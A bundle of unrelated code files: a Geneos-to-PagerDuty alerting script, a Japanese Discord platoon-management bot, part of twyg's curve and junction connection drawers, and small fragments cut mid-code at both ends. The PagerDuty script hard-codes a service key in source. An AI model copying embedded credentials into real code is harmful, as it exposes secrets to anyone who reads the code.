y_pred_poly = model.predict(X_test_poly)
# Print each polynomial-model prediction on its own line.
for i in range(len(y_pred_poly)):
    print("{:.2f}".format(y_pred_poly[i].item()))
|
<gh_stars>0
import requests, base64, json, sys, argparse, os, time
import urllib3
from datetime import datetime
from argparse import RawTextHelpFormatter
# For Supressing warnings
# urllib3.disable_warnings()
#Uber ASCII Art
Uber_Small_ASCII = ("" + \
" .,coxOKXNWMWl \n" + \
" .;okKWMMMMMMMMMWl .. \n" + \
" .:xKWMMMMMMMMMMMMMWd.... 'k0d;. \n" + \
" 'o0WMMMMMMMMMMMMMMMMMNXKKKOkdl:'. ;0WMMW0l. \n" + \
" .dXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNKxxKMMMMMMWXo. \n" + \
" .lKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKl. \n" + \
" 'kWMMMMMMMMMMMMMMMMMWX0OxxxxxkO0XWMMMMMMMMMMMMMMMMMWk' \n" + \
" .dNMMMMMMMMMMMMMMW0dc,.. ..,cxKWMMMMMMMMMMMMMMM0; \n" + \
" .'lkXWMMMMMMMMXx;. .;xXMMMMMMMMMMMMMMK: \n" + \
" lNMMMMMMXd' 'dNMMMMMMMMMMMMM0, \n" + \
" ,0MMMMMM0; :0WMMMMMMMMMMMWk.\n" + \
" .kWMMMMMO' ,OMMMMMMMMMMMMNc\n" + \
" cNMMMMMK; 'lxO0OOxl' ;KMMMMMMMMMMMMO\n" + \
" .xMMMMMWo .dNMMMMMMMMXd. .dWMMMMMMMMMMMX\n" + \
" .OMMMMMX: .dWMMMMMMMMMMWo :NMMMMMMMMMMMN\n" + \
"'odkNMMMMMK; .kMMMMMMMMMMMMk. ;XMMMMMMMMWk:;\n" + \
":NMMMMMMMMN: cXMMMMMMMMMMX: cNMMMMMMMMX: \n" + \
",KMMMMMMMMWx. ;kNWMMMMWNk; .xMMMMMMMMM0' \n" + \
".xWMMMMMMMMX: ':lllc:' cXMMMMMMMMWd. \n" + \
" ;KMMMMMMMMMK: :KMMMMMMMMMK, \n" + \
" lNMMMMMMMMMXl. .oXMMMMMMMMMNl \n" + \
" .oNMMMMMMMMMWO:. .:OWMMMMMMMMMNo. \n" + \
" .lXMMMMMMMMMMW0l'. .,o0WMMMMMMMMMMXl. \n" + \
" :0WMMMMMMMMMMMN0dc;'........';ld0NMMMMMMMMMMMW0; \n" + \
" .oXMMMMMMMMMMMMMMWNXK000KKXNWMMMMMMMMMMMMMMXo. \n" + \
" 'dXWMMMWWMMMMMMMMMMMMMMMMMMMMMMMWWMMMMWXd' \n" + \
" .lONNd;cdOXWWMMMMMMMMMMMMWWXOdc:kNNOl. \n" + \
" .cc. .,cx0XNWWMWWWNKOxc,. .oc. \n\n" + \
" - Geneos Integrations for PagerDuty - \n" )
# Build the --help text: ASCII-art banner plus usage examples.
Usage_Msg = ( Uber_Small_ASCII + \
"\n\tExample for resolving a PagerDuty incident:\n\n" + \
"\t\t" + sys.argv[0] + " -r \"MyGateway\\MyProbe\\MySampler\\MyDataview\\MyIncident\"\n" + \
"\n\tExample for acknowledging a PagerDuty incident:\n\n" + \
"\t\t" + sys.argv[0] + " -a \"MyGateway\\MyProbe\\MySampler\\MyDataview\\MyIncident\"\n")
# Arg Parser https://stackoverflow.com/questions/15753701/argparse-option-for-passing-a-list-as-option https://docs.python.org/2/howto/argparse.html
parser = argparse.ArgumentParser( description= Usage_Msg , formatter_class=RawTextHelpFormatter)
# Typical operations for PagerDuty
parser.add_argument( "-r", "--resolve", help = "resolves targeted Incident", type=str)
parser.add_argument( "-a", "--acknowledge", help = "acknowledges targeted Incident", type=str)
# NOTE(review): "serivce" below is a typo in the user-facing help text.
parser.add_argument( "-s", "--servicekey", help = "serivce key from PagerDuty's integration services", type=str)
parser.add_argument( "-t", "--trigger", help = "triggers and creates an Incident in PagerDuty, if no Incident Key is provided then one is generated", type=str)
# Parsed command-line arguments, used as a module-level global below.
args = parser.parse_args()
# Snapshot the whole process environment as a JSON structure; the Geneos
# "_*" variables in it are copied into each event's custom details later.
Env_JSON = json.dumps(dict(**os.environ), sort_keys=True, indent=4)
EnvData = json.loads(Env_JSON)
# Pre-Reqs
# NOTE(review): hard-coded service key checked into source — rotate it and
# load it from configuration or an environment variable instead.
SERVICE_KEY = "3e2966c4fe574b978ca0db7414d5e504" # Variablize this value
# A -s/--servicekey argument overrides the hard-coded default.
if (args.servicekey):
    SERVICE_KEY = args.servicekey # Variablize this value
GENEOS_PAYLOAD = {} # Massive Payload of geneos information
# Incident Key (x,y of our geneos integration); built from the Geneos
# environment unless an explicit key was passed with -a or -r.
# WARNING :: PagerDuty has 255 Character Limit
if not (args.acknowledge) and not (args.trigger) and not (args.resolve):
    INCIDENT_KEY = EnvData["_GATEWAY"] + "\\" + EnvData["_PROBE"] + "\\" + EnvData["_MANAGED_ENTITY"] + "\\" + EnvData["_SAMPLER"] + "\\" + EnvData["_DATAVIEW"] + "\\" + EnvData["_ROWNAME"] + "\\" + EnvData["_COLUMN"]
elif (args.acknowledge):
    INCIDENT_KEY = (args.acknowledge)
elif (args.resolve):
    INCIDENT_KEY = (args.resolve)
# elif (args.trigger):
#     INCIDENT_KEY = (args.trigger)
# For testing the script, in lieu of any proxy configuration to test against:
# export _GATEWAY="SomeGateway"
# export _PROBE="SomeProbe"
# export _SAMPLER="SomeSampler"
# export _MANAGED_ENTITY="SomeEntity"
# export _DATAVIEW="SomeDataview"
# export _ROWNAME="SomeRowName"
# export _SEVERITY="CRITICAL"
# export _PREVIOUS_SEV="2"
# apiKey = "<KEY>"
pagerduty_session = requests.Session()
# Timestamps attached to every event's custom details.
unix_time = time.time()
human_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
# Incident interactions
def event_trigger_incident():
    """Trigger (or update) a PagerDuty incident via the Events v2 API.

    With -t/--trigger a generic "Active Console" incident is sent without a
    dedup key; otherwise the Geneos environment variables build the summary
    and INCIDENT_KEY is used as the dedup key.
    Raises ValueError when PagerDuty does not accept the event (HTTP != 202).
    Documentation: https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2
    """
    header = {
        "Content-Type": "application/json"
    }
    if(args.trigger):
        # Manual trigger from the Active Console: minimal payload, no dedup key.
        payload = {
            "routing_key": SERVICE_KEY,
            "event_action": "trigger",
            # "dedup_key": INCIDENT_KEY,
            # "integration_key": INCIDENT_KEY,
            "payload": {
                "summary" : "Alerted from an Active Console",
                "severity": "critical",
                "source" : "Active Console",
                "custom_details" : {
                    "Geneos Event Data" : {
                        "HUMAN_TIME" : human_time,
                        "UNIX_TIME" : unix_time
                    },
                    "Custom Message" : "Use custom detailed here Message"
                }
            }
        }
    else:
        # Automated trigger from a Geneos rule: summary and key come from
        # the Geneos environment variables.
        payload = {
            "routing_key": SERVICE_KEY,
            "event_action": "trigger",
            "dedup_key": INCIDENT_KEY,
            "payload": {
                "summary" : "Alert on " + EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"] + " - Date: " + human_time + " - Row: " + EnvData["_ROWNAME"] + " : " + EnvData["_COLUMN"] + " at " + EnvData["_VALUE"],
                "severity": "critical",
                "source" : EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
                "custom_details" : {
                    "Geneos Event Data" : {
                        "HUMAN_TIME" : human_time,
                        "UNIX_TIME" : unix_time,
                        "_SEVERITY" : EnvData["_SEVERITY"]
                    },
                    "Custom Message" : "Use custom detailed here Message"
                }
            }
        }
    # Copy every Geneos "_*" environment variable into the custom details so
    # the incident carries the full Geneos context.
    for EnvKey in EnvData:
        if EnvKey.startswith("_"):
            payload["payload"]["custom_details"]["Geneos Event Data"][EnvKey] = EnvData[EnvKey]
    # Post the event to the PagerDuty Events v2 endpoint.
    PagerResponse = pagerduty_session.post('https://events.pagerduty.com/v2/enqueue',
            data=json.dumps(payload),
            headers=header)
    if PagerResponse.status_code != 202:
        raise ValueError(
            'Request to the PagerDuty server returned an error %s, the response is:\n%s'
            % (PagerResponse.status_code, PagerResponse.text)
        )
    # If all is good
    if PagerResponse.json()["status"] == "success":
        print('Incident Created')
    else:
        print(PagerResponse.text)  # print error message if not successful
    # Print json response info to the screen
    print(json.dumps(PagerResponse.json(), indent=2))
def cmd_trigger_incident():
    """Trigger a PagerDuty incident (command-line variant) via Events v2.

    Same as event_trigger_incident, except the --trigger branch also sends
    dedup_key/integration_key.
    Raises ValueError when PagerDuty does not accept the event (HTTP != 202).
    Documentation: https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2
    """
    header = {
        "Content-Type": "application/json"
    }
    if(args.trigger):
        payload = {
            "routing_key": SERVICE_KEY,
            "event_action": "trigger",
            "dedup_key": INCIDENT_KEY,
            "integration_key": INCIDENT_KEY,
            "payload": {
                "summary" : "Alerted from an Active Console",
                "severity": "critical",
                "source" : "Active Console",
                "custom_details" : {
                    "Geneos Event Data" : {
                        "HUMAN_TIME" : human_time,
                        "UNIX_TIME" : unix_time
                    },
                    "Custom Message" : "Use custom detailed here Message"
                }
            }
        }
    else:
        payload = {
            "routing_key": SERVICE_KEY,
            "event_action": "trigger",
            "dedup_key": INCIDENT_KEY,
            "payload": {
                "summary" : "Alert on " + EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"] + " - Date: " + human_time + " - Row: " + EnvData["_ROWNAME"] + " : " + EnvData["_COLUMN"] + " at " + EnvData["_VALUE"],
                "severity": "critical",
                "source" : EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
                "custom_details" : {
                    "Geneos Event Data" : {
                        "HUMAN_TIME" : human_time,
                        "UNIX_TIME" : unix_time,
                        "_SEVERITY" : EnvData["_SEVERITY"]
                    },
                    "Custom Message" : "Use custom detailed here Message"
                }
            }
        }
    # Copy every Geneos "_*" environment variable into the custom details.
    for EnvKey in EnvData:
        if EnvKey.startswith("_"):
            payload["payload"]["custom_details"]["Geneos Event Data"][EnvKey] = EnvData[EnvKey]
    # Post the event to the PagerDuty Events v2 endpoint.
    PagerResponse = pagerduty_session.post('https://events.pagerduty.com/v2/enqueue',
            data=json.dumps(payload),
            headers=header)
    if PagerResponse.status_code != 202:
        raise ValueError(
            'Request to the PagerDuty server returned an error %s, the response is:\n%s'
            % (PagerResponse.status_code, PagerResponse.text)
        )
    # If all is good
    if PagerResponse.json()["status"] == "success":
        print('Incident Created')
    else:
        print(PagerResponse.text)  # print error message if not successful
    # Print json response info to the screen
    print(json.dumps(PagerResponse.json(), indent=2))
def event_ack_incident():
    """Acknowledge a triggered incident via the PagerDuty Events v2 API.

    Uses INCIDENT_KEY as the dedup key; the summary comes either from the
    -a command-line argument (manual ack) or from the Geneos environment.
    Raises ValueError when PagerDuty does not accept the event (HTTP != 202).
    """
    header = {
        "Content-Type": "application/json"
    }
    if (args.acknowledge):
        # Manual acknowledgement from the Active Console.
        payload = {
            "routing_key": SERVICE_KEY,
            "event_action": "acknowledge",
            "dedup_key": INCIDENT_KEY,
            "integration_key": INCIDENT_KEY,
            "payload": {
                "summary" : "Acknowledged on Active Console",
                "severity": "warning",
                "source" : "Manually Acknowledged",
                "custom_details" : {
                    "Geneos Event Data" : {
                        "HUMAN_TIME" : human_time,
                        "UNIX_TIME" : unix_time
                    },
                    "Custom Message" : "Use custom detailed here Message"
                }
            }
        }
    else:
        # Automated acknowledgement driven by the Geneos environment.
        payload = {
            "routing_key": SERVICE_KEY,
            "event_action": "acknowledge",
            "dedup_key": INCIDENT_KEY,
            "integration_key": INCIDENT_KEY,
            "payload": {
                "summary" : "Acknowledged on " + EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
                "severity": "warning",
                "source" : EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
                "custom_details" : {
                    "Geneos Event Data" : {
                        "HUMAN_TIME" : human_time,
                        "UNIX_TIME" : unix_time,
                        "_SEVERITY" : EnvData["_SEVERITY"]
                    },
                    "Custom Message" : "Use custom detailed here Message"
                }
            }
        }
    # Copy every Geneos "_*" environment variable into the custom details.
    for EnvKey in EnvData:
        if EnvKey.startswith("_"):
            payload["payload"]["custom_details"]["Geneos Event Data"][EnvKey] = EnvData[EnvKey]
    # Post to PagerDuty Server
    PagerResponse = pagerduty_session.post('https://events.pagerduty.com/v2/enqueue',
            data=json.dumps(payload),
            headers=header)
    # Check the HTTP status before parsing the body: a non-202 error response
    # may not be JSON, and calling .json() first would mask the real error.
    if PagerResponse.status_code != 202:
        raise ValueError(
            'Request to the PagerDuty server returned an error %s, the response is:\n%s'
            % (PagerResponse.status_code, PagerResponse.text)
        )
    # If all is good
    if PagerResponse.json()["status"] == "success":
        print('Incident Acknowledged ')
    else:
        print(PagerResponse.text)  # print error message if not successful
    # Print json response info to the screen
    print(json.dumps(PagerResponse.json(), indent=2))
def event_resolve_incident():
    """Resolve a PagerDuty incident via the Events v2 API.

    Uses INCIDENT_KEY as the dedup key; the summary comes either from the
    -r command-line argument (manual resolve) or from the Geneos environment.
    Raises ValueError when PagerDuty does not accept the event (HTTP != 202).
    """
    header = {
        "Content-Type": "application/json"
    }
    if (args.resolve):
        # Manual resolution from the Active Console.
        payload = {
            "routing_key": SERVICE_KEY,
            "event_action": "resolve",
            "dedup_key": INCIDENT_KEY,
            "payload": {
                "summary" : "Resolved from Active Console",
                "severity": "info",
                "source" : "from Active Console",
                "custom_details" : {
                    "Geneos Event Data" : {
                        "HUMAN_TIME" : human_time,
                        "UNIX_TIME" : unix_time
                    },
                    "Custom Message" : "Use custom detailed here Message"
                }
            }
        }
    else:
        # Automated resolution driven by the Geneos environment.
        payload = {
            "routing_key": SERVICE_KEY,
            "event_action": "resolve",
            "dedup_key": INCIDENT_KEY,
            "payload": {
                "summary" : "Resolved on " + EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
                "severity": "info",
                "source" : EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
                "custom_details" : {
                    "Geneos Event Data" : {
                        "HUMAN_TIME" : human_time,
                        "UNIX_TIME" : unix_time
                    },
                    "Custom Message" : "Use custom detailed here Message"
                }
            }
        }
    PagerResponse = pagerduty_session.post('https://events.pagerduty.com/v2/enqueue',
            data=json.dumps(payload),
            headers=header)
    # Check the HTTP status before parsing the body: a non-202 error response
    # may not be JSON, and calling .json() first would mask the real error.
    if PagerResponse.status_code != 202:
        raise ValueError(
            'Request to the PagerDuty server returned an error %s, the response is:\n%s'
            % (PagerResponse.status_code, PagerResponse.text)
        )
    if PagerResponse.json()["status"] == "success":
        print('Incident Resolved ')
    else:
        print(PagerResponse.text)  # print error message if not successful
    # Print json response info to the screen
    print(json.dumps(PagerResponse.json(), indent=2))
if __name__ == '__main__':
    # Explicit command-line actions take precedence; otherwise fall back to
    # mapping the Geneos _SEVERITY environment variable onto PagerDuty actions.
    if (args.acknowledge):
        # user_ack_incident(args.acknowledge)
        event_ack_incident()
    elif (args.resolve):
        # user_resolve_incident(args.resolve)
        event_resolve_incident()
    elif (args.trigger):
        # user_trigger_incident(args.trigger)
        event_trigger_incident()
    elif "_SEVERITY" in EnvData:
        if (EnvData["_SEVERITY"] == "CRITICAL"):
            # Trigger or update an open incident
            event_trigger_incident()
        if (EnvData["_SEVERITY"] == "WARNING") :
            # Acknowledge the incident
            event_ack_incident()
        if (EnvData["_SEVERITY"] == "OK") or (EnvData["_SEVERITY"] == "UNDEFINED"):
            # Severity cleared (or unknown): resolve the incident
            event_resolve_incident()
|
<filename>platoonbot.py
# インストールした discord.py を読み込む
from collections import deque
from sys import version
from discord import channel
import discord
# Discord bot token — placeholder, must be filled in before running.
TOKEN = ''
client = discord.Client()
# All IDs below are zeroed-out placeholders; replace with real Discord IDs.
CHANNEL_ID_PARTY_1 = 000000000000000000 # platoon channel 1
CHANNEL_ID_PARTY_2 = 000000000000000000 # platoon channel 2
CHANNEL_ID_PARTY_3 = 000000000000000000 # platoon channel 3
CHANNEL_ID_PARTY_LOBBY = 000000000000000000 # channel showing platoon status
MSG_ID_1= 000000000000000000 # status message for platoon 1
MSG_ID_2= 000000000000000000 # status message for platoon 2
MSG_ID_3= 000000000000000000 # status message for platoon 3
# party_status*: True while the platoon slot is EMPTY (False = platoon exists)
party_status = True
party_status2 = True
party_status3 = True
# Current member count of each platoon.
party_member = 1
party_member2 = 1
party_member3 = 1
# Reply language per channel: 0 = Japanese, 1 = English.
langmode = 0
langmode2 = 0
langmode3 = 0
# Name of the last created platoon per channel (shown in the lobby).
make_name1 = str()
make_name2 = str()
make_name3 = str()
# One-time setup: post the three placeholder status messages in the lobby
# channel (run once, then record the resulting message IDs in MSG_ID_1..3).
async def make_platoon_info():
    lobby = client.get_channel(CHANNEL_ID_PARTY_LOBBY)
    for label in ("Platoon1", "Platoon2", "Platoon3"):
        await lobby.send(label + ' : 空')
# Fires once the gateway connection is established.
@client.event
async def on_ready():
    # Log a startup notice to the terminal.
    print('ログインしました')
    presence = discord.Game(name="/hplahelp | /hplahelp -en")
    await client.change_presence(status=discord.Status.idle, activity=presence)
    # await make_platoon_info() #初回使用時だけ有効化する (enable only on first use)
# Runs whenever a message is received. The three platoon channels used to be
# handled by three near-identical inline copies; they now share one helper.

async def _handle_party_channel(message, path, status, member, lang, name,
                                announce_lang):
    """Handle the platoon commands for one platoon channel.

    message      -- the incoming discord message
    path         -- member-list file for this platoon ("party.txt", ...)
    status       -- True while the platoon slot is empty (no platoon exists)
    member       -- current member count
    lang         -- 0 = Japanese replies, 1 = English replies
    name         -- persisted platoon name (shown by /hstatus and the lobby)
    announce_lang -- whether /hlja and /hlen send a confirmation reply
                     (only channel 1 did so originally)

    Returns the updated (status, member, lang, name) tuple.
    """
    def user_in_file():
        # Substring match against the stored member list.
        # NOTE(review): this matches partial names too — confirm acceptable.
        with open(path) as f:
            for line in f:
                if str(message.author) in line:
                    return True
        return False

    content = message.content
    author = str(message.author)

    if content == "/hlja":
        lang = 0
        if announce_lang:
            await message.channel.send("言語モードを日本語に設定しました")
    if content == "/hlen":
        lang = 1
        if announce_lang:
            await message.channel.send("Lang mode change english")

    if content.startswith("/hmake"):
        if status:
            name = content[7:]
            status = False
            member = 1
            if lang == 0:
                await message.channel.send(author + "さんが" + str(name) + "を作成しました [" + str(member) + "/5]")
            elif lang == 1:
                await message.channel.send(author + " make a " + str(name) + " [" + str(member) + "/5]")
            # Start a fresh member list containing only the creator.
            with open(path, "w") as f:
                f.write(author + "\n")
        else:
            if lang == 0:
                await message.channel.send("既に小隊が存在します")
            elif lang == 1:
                await message.channel.send("platoon already exist")

    if content == "/hjoin":
        if user_in_file():
            if lang == 0:
                await message.channel.send("既に参加しています")
            elif lang == 1:
                await message.channel.send("you already join a platoon")
        else:
            if status == False and member < 5:
                member += 1
                if lang == 0:
                    await message.channel.send(author + "さんが小隊に参加しました [" + str(member) + "/5]")
                elif lang == 1:
                    await message.channel.send(author + " join a platoon [" + str(member) + "/5]")
                with open(path, "a") as f:
                    f.write(author + "\n")
            elif member >= 5:
                if lang == 0:
                    await message.channel.send("満員のため参加できません")
                elif lang == 1:
                    await message.channel.send("you cant join because a platoon is full")
            elif status:
                if lang == 0:
                    await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
                elif lang == 1:
                    await message.channel.send("platoon doesnt exist. please make a platoon before")

    if content == "/hleave":
        if not user_in_file():
            if lang == 0:
                await message.channel.send("あなたは小隊に参加していません")
            elif lang == 1:
                await message.channel.send("you arent join a platoon")
        else:
            if status == False and member > 1:
                member -= 1
                if lang == 0:
                    await message.channel.send(author + "さんが小隊を退出しました [" + str(member) + "/5]")
                elif lang == 1:
                    await message.channel.send(author + " leave a party [" + str(member) + "/5]")
                # Drop the leaving user from the member list file.
                with open(path, "r") as f:
                    roster = f.read()
                with open(path, "w") as f:
                    f.write(roster.replace(author, ""))
            elif status == False and member <= 1:
                if lang == 0:
                    await message.channel.send("メンバーがいなくなったため解散します")
                elif lang == 1:
                    await message.channel.send("break a platoon because all member missed")
                status = True
            elif status:
                if lang == 0:
                    await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
                elif lang == 1:
                    await message.channel.send("platoon doesnt exist. please make a platoon before")

    if content == "/hstatus":
        if status == False:
            with open(path, "r") as f:
                data = f.read()
            # BUGFIX: show the persisted platoon name; the original printed a
            # local variable that was always empty for /hstatus messages.
            await message.channel.send(str(name) + "\n" + data + "\n[" + str(member) + "/5]")
        elif status:
            if lang == 0:
                await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
            elif lang == 1:
                await message.channel.send("platoon doesnt exist. please make a platoon before")

    if content == "/hbreak":
        if user_in_file():
            if status == False:
                if lang == 0:
                    await message.channel.send("正常に解散されました")
                elif lang == 1:
                    await message.channel.send("break a party successfully")
                status = True
            elif status:
                if lang == 0:
                    await message.channel.send("小隊が存在しないため解散できません")
                elif lang == 1:
                    await message.channel.send("cant break a party because party doesnt exist")
        else:
            if lang == 0:
                await message.channel.send("あなたは小隊に参加していないため、小隊を解散することはできません")
            elif lang == 1:
                await message.channel.send("you cant break a party, because you arent join the party")

    return status, member, lang, name


@client.event
async def on_message(message):
    global party_status,party_status2,party_status3,party_member,party_member2,party_member3,langmode,langmode2,langmode3,make_name1,make_name2,make_name3
    # Ignore messages from bots (including ourselves).
    if message.author.bot:
        return
    if message.content == "/hplahelp":
        await message.author.send("/hplahelp -en: display english platoon cmd help\n/hmake [小隊名]:小隊を作成します\n/hjoin:小隊に参加します\n/hleave:小隊から抜けます\n/hstatus:メンバーを表示します\n/hbreak:小隊を解散します\n/hlja:言語モードを日本語にします\n/hlen:change lang mode english")
    if message.content == "/hplahelp -en":
        await message.author.send("/hmake [platoon name]:make a platoon\n/hjoin:join platoon\n/hleave:leave platoon\n/hstatus:display platoon member\n/hbreak:break platoon\n/hlja:change lang mode japanese\n/hlen:change lang mode english")
    # Platoon channel 1 (the only channel that announces /hlja and /hlen).
    if message.channel.id == CHANNEL_ID_PARTY_1:
        (party_status, party_member,
         langmode, make_name1) = await _handle_party_channel(
            message, "party.txt", party_status, party_member, langmode,
            make_name1, True)
        await change_platoon_info()
    # Platoon channel 2
    elif message.channel.id == CHANNEL_ID_PARTY_2:
        (party_status2, party_member2,
         langmode2, make_name2) = await _handle_party_channel(
            message, "party2.txt", party_status2, party_member2, langmode2,
            make_name2, False)
        await change_platoon_info()
    # Platoon channel 3
    elif message.channel.id == CHANNEL_ID_PARTY_3:
        (party_status3, party_member3,
         langmode3, make_name3) = await _handle_party_channel(
            message, "party3.txt", party_status3, party_member3, langmode3,
            make_name3, False)
        await change_platoon_info()
    # Emergency reset command.
    # BUGFIX: the original condition `id == CHANNEL_ID_PARTY_1 or
    # CHANNEL_ID_PARTY_2 or ...` was always true, and it reset
    # party_member3 instead of party_status3.
    if message.channel.id in (CHANNEL_ID_PARTY_1, CHANNEL_ID_PARTY_2, CHANNEL_ID_PARTY_3):
        if message.content == "/hclear":
            party_status = True
            party_status2 = True
            party_status3 = True
# Refresh the three pinned platoon-status messages in the lobby channel.
# NOTE: this is a plain helper coroutine, not a gateway event; the original
# @client.event registration was removed because discord.py never dispatches
# an event by this name (the coroutine is only awaited directly).
async def change_platoon_info():
    channel = client.get_channel(CHANNEL_ID_PARTY_LOBBY)
    slots = (
        (MSG_ID_1, "Platoon1", party_status, party_member, make_name1),
        (MSG_ID_2, "Platoon2", party_status2, party_member2, make_name2),
        (MSG_ID_3, "Platoon3", party_status3, party_member3, make_name3),
    )
    for msg_id, label, empty, members, name in slots:
        msg = await channel.fetch_message(msg_id)
        if empty:
            await msg.edit(content=label + " : 空")
        else:
            await msg.edit(content=label + " : [" + str(members) + "/5] " + "name:" + name)
# Start the bot and connect to Discord (blocks until shutdown).
client.run(TOKEN)
|
import os
from twyg.common import createpath
from twyg.config import (Properties, NumberProperty,
EnumProperty, ColorProperty)
from twyg.geom import Vector2
from twyg.geomutils import arcpath
from twyg.tree import Direction, opposite_dir
# TODO util function in common?
def defaults_path(conf):
    """Return the path of the bundled defaults file for connection drawers."""
    return os.path.join('connection', conf)
class CurveConnectionDrawer(object):
    """Draws tapered Bezier-curve connections between a node and its
    child nodes."""

    def __init__(self, config=None):
        # BUGFIX: the original used a mutable default argument
        # (config={}); None is the safe equivalent.
        if config is None:
            config = {}
        properties = {
            'nodeLineWidthStart': (NumberProperty, {'min': 0.0}),
            'nodeLineWidthEnd': (NumberProperty, {'min': 0.0}),
            'nodeCx1Factor': (NumberProperty, {}),
            'nodeCx2Factor': (NumberProperty, {}),
            'nodeCy1Factor': (NumberProperty, {}),
            'nodeCy2Factor': (NumberProperty, {})
        }
        self._props = Properties(properties, defaults_path('curve'), config)

    def _eval_func(self, node):
        # Bind property evaluation to a specific node.
        return lambda name: self._props.eval(name, node)

    def draw(self, node):
        """
        Draw a curved connection between a node and its child nodes.
        """
        E = self._eval_func(node)
        if node.isleaf():
            return
        _ctx.autoclosepath(True)
        _ctx.stroke(node.connectioncolor)
        _ctx.fill(node.connectioncolor)
        children = node.children
        for child in children:
            linewidth = E('nodeLineWidthEnd')
            _ctx.strokewidth(linewidth)
            direction = child.direction()
            opp_direction = opposite_dir(direction)
            x1, y1 = node.connection_point(direction)
            x2, y2 = child.connection_point(opp_direction)
            # Nudge the endpoint so the stroke does not overlap the node edge.
            if direction == Direction.Left:
                x2 -= linewidth / 2
            elif direction == Direction.Right:
                x2 += linewidth / 2
            if len(children) == 1:
                # Single child: a straight line suffices.
                _ctx.line(x1, y1, x2, y2)
            else:
                # Control points of the cubic curve, scaled by the config
                # factors.
                cx1 = (x2 - x1) * E('nodeCx1Factor')
                cx2 = (x2 - x1) * E('nodeCx2Factor')
                cy1 = (y2 - y1) * E('nodeCy1Factor')
                cy2 = (y2 - y1) * E('nodeCy2Factor')
                p1x = x1 + cx1
                p1y = y1 + cy1
                p2x = x2 - cx2
                p2y = y2 - cy2
                # Draw the connection as a closed, tapered shape: out along
                # one curve and back along the other, offset by the start
                # width.
                startwidth = E('nodeLineWidthStart') - 1
                sw = startwidth / 2.
                _ctx.beginpath(x1, y1 - sw)
                _ctx.curveto(p1x, p1y, p2x, p2y, x2, y2)
                _ctx.curveto(p2x, p2y, p1x, p1y, x1, y1 + sw)
                _ctx.endpath()
class JunctionConnectionDrawer(object):
    """Draws right-angled connections with a junction point between a node
    and its children, with configurable corner style (square/beveled/
    rounded) and an optional junction marker with a +/- sign."""

    def __init__(self, config=None):
        # BUGFIX: the original used a mutable default argument (config={});
        # None is the safe equivalent.
        if config is None:
            config = {}
        corner_styles = ('square', 'beveled', 'rounded')
        junction_styles = ('none', 'square', 'disc', 'diamond')
        junction_sign = ('none', 'plus', 'minus')
        properties = {
            'lineWidth': (NumberProperty, {'min': 0.0}),
            'junctionXFactor': (NumberProperty, {}),
            'cornerStyle': (EnumProperty, {'values': corner_styles}),
            'cornerRadius': (NumberProperty, {'min': 0.0}),
            'cornerPad': (NumberProperty, {'min': 0.0}),
            'junctionStyle': (EnumProperty, {'values': junction_styles}),
            'junctionRadius': (NumberProperty, {'min': 0.0}),
            'junctionFillColor': (ColorProperty, {}),
            'junctionStrokeWidth': (NumberProperty, {'min': 0.0}),
            'junctionStrokeColor': (ColorProperty, {}),
            'junctionSign': (EnumProperty, {'values': junction_sign}),
            'junctionSignSize': (NumberProperty, {'min': 0.0}),
            'junctionSignStrokeWidth': (NumberProperty, {'min': 0.0}),
            'junctionSignColor': (ColorProperty, {})
        }
        self._props = Properties(properties, defaults_path('junction'),
                                 config)

    def _eval_func(self, node):
        # Bind property evaluation to a specific node.
        return lambda name: self._props.eval(name, node)

    def draw(self, node):
        # The root may have children on both sides; draw each side
        # separately.
        if node.isroot():
            self._draw(node, Direction.Left)
            self._draw(node, Direction.Right)
        else:
            self._draw(node)

    def _draw(self, node, direction=None):
        """
        Draw a junction-style connection between `node` and its child
        nodes on the given side (all children when direction is None).
        """
        E = self._eval_func(node)
        children = node.getchildren(direction)
        if not children:
            return
        linewidth = E('lineWidth')
        _ctx.autoclosepath(True)
        _ctx.stroke(node.connectioncolor)
        _ctx.fill(node.connectioncolor)
        _ctx.strokewidth(linewidth)
        firstchild = children[0]
        lastchild = children[-1]
        direction = firstchild.direction()
        opp_direction = opposite_dir(direction)
        x1, y1 = node.connection_point(direction)
        xfirst, yfirst = firstchild.connection_point(opp_direction)
        # Special case: draw straight line if there's only one child
        if len(children) == 1:
            _ctx.line(x1, y1, xfirst, yfirst)
            return
        # Calculate junction point position
        jx = x1 + (xfirst - x1) * E('junctionXFactor')
        jy = y1
        # Draw line from parent node to junction point
        _ctx.line(x1, y1, jx, jy)
        # Limit first & last corner radius to the available area
        ylast = lastchild.connection_point(opp_direction)[1]
        ysecond = children[1].connection_point(opp_direction)[1]
        ypenultimate = children[-2].connection_point(opp_direction)[1]
        # Starting corner radius
        cornerPad = E('cornerPad')
        r = min(E('cornerRadius'), abs(jx - xfirst) - cornerPad)
        r = max(r, 0)
        # Adjusted first (top) corner radius
        r1 = min(r, abs(yfirst - jy) - cornerPad)
        r1 = max(r1, 0)
        if ysecond < jy:
            r1 = min(r, abs(yfirst - ysecond) - cornerPad)
            r1 = max(r1, 0)
        # Adjusted last (bottom) corner radius
        r2 = min(r, abs(ylast - jy) - cornerPad)
        r2 = max(r2, 0)
        if ypenultimate > jy:
            r2 = min(r, abs(ylast - ypenultimate) - cornerPad)
            r2 = max(r2, 0)
        # Draw main branch as a single path to ensure line continuity
        p1 = Vector2(jx, yfirst + r1)
        p2 = Vector2(jx, ylast - r2)
        segments = [[p1, p2]]
        corner_style = E('cornerStyle')
        # The unused enumerate index of the original loop was dropped.
        for child in children:
            direction = child.direction()
            opp_direction = opposite_dir(direction)
            x2, y2 = child.connection_point(opp_direction)
            # Nudge the endpoint so the stroke does not overlap the node
            # edge.
